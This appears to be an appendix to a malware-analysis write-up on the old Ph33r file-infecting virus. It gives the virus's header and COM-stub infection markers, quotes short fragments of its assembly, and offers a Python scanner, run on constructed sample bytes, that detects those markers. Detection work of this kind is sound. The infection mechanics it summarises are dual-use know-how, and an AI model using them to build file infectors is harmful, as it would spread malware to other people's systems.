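Appendix to the Ph33r section: the listing carries three stable file-level indicators. EXE and Windows NE infection writes the marker word 0AFAFh into the checksum field at offset 12h of the MZ header (`mov word ptr [si+12h],0afafh`); COM infection overwrites the first four bytes with the stub `0e9h,0,0,0afh`, with the jump displacement set to the original length minus 3 so the appended body starts exactly at the original end of file; and the body contains the strings '=Ph33r=' and 'Qark/VLAD'. The following Python is an added example, not code from the zine or from VLAD: a scanner that reports those indicators per file. The sample inputs are constructed header and marker bytes with no executable content. A nonzero checksum word also occurs in legitimate linker output, so the checksum hit on its own is only a heuristic and the function returns every indicator it found rather than a verdict.

```python
import struct

# Indicators read from the Ph33r listing. None is proof on its own: the MZ checksum
# field is nonzero in some legitimate files, so report matches and let the analyst decide.
MARKER_WORD = 0xAFAF          # 'mov word ptr [si+12h],0afafh': checksum word of the MZ/NE header
COM_MARKER = 0xAF             # 4th byte of com_jmp: db 0e9h,0,0,0afh
BODY_STRINGS = (b"=Ph33r=", b"Qark/VLAD")


def scan_ph33r(data: bytes) -> dict:
    hits = []
    kind = "raw"
    # The virus ORs the first word with 2020h and compares it with 'zm', so it only
    # recognises files beginning "MZ" in any letter case (a "ZM" header is skipped).
    if len(data) >= 0x1C and data[:2].lower() == b"mz":
        kind = "mz"
        csum = struct.unpack_from("<H", data, 0x12)[0]
        reloc_off = struct.unpack_from("<H", data, 0x18)[0]
        if reloc_off >= 0x40:
            kind = "ne"       # 'cmp word ptr [si+18h],40h': relocation table at 40h+ means a Windows NE file
        if csum == MARKER_WORD:
            hits.append("mz_checksum_marker")
    elif len(data) >= 4 and data[0] == 0xE9 and data[3] == COM_MARKER:
        kind = "com"
        hits.append("com_jmp_marker")
        # com_infect stores (original length - 3) as the jmp displacement, so the
        # appended body sits at displacement + 3, which is the original end of file.
        body_at = struct.unpack_from("<H", data, 1)[0] + 3
        if body_at < len(data):
            hits.append(f"body_at_{body_at}")
    for s in BODY_STRINGS:
        if s in data:
            hits.append("string:" + s.decode("ascii"))
    return {"kind": kind, "indicators": hits, "suspicious": bool(hits)}


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan_ph33r(fh.read())


# ---- constructed samples: header and marker bytes only, no executable code ----
def mz_header(checksum: int, reloc_off: int = 0x1C) -> bytes:
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<H", hdr, 0x12, checksum)
    struct.pack_into("<H", hdr, 0x18, reloc_off)
    return bytes(hdr)

ORIG_LEN = 1100                                   # com_infect only touches files of 1024..60000 bytes
CLEAN_COM = b"\xB4\x09\xBA\x00\x01\xCD\x21\xC3" + b"\x00" * (ORIG_LEN - 8)
MARKED_COM = (b"\xE9" + struct.pack("<H", ORIG_LEN - 3) + bytes([COM_MARKER])
              + b"\x00" * (ORIG_LEN - 4) + b"\x00" * 64 + b"=Ph33r=")
CLEAN_EXE = mz_header(0) + b"\x00" * 1024
MARKED_EXE = mz_header(MARKER_WORD) + b"\x00" * 1024 + b"Qark/VLAD"

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, scan_file(path))
    for label, blob in (("clean.com", CLEAN_COM), ("marked.com", MARKED_COM),
                        ("clean.exe", CLEAN_EXE), ("marked.exe", MARKED_EXE)):
        print(label, scan_ph33r(blob))
```

Run it with file paths as arguments to scan real files, or with none to see the constructed samples classified. The `body_at_N` indicator is worth cross-checking by hand: on a genuinely infected COM file N equals the pre-infection size, so the bytes from N onward are the appended body.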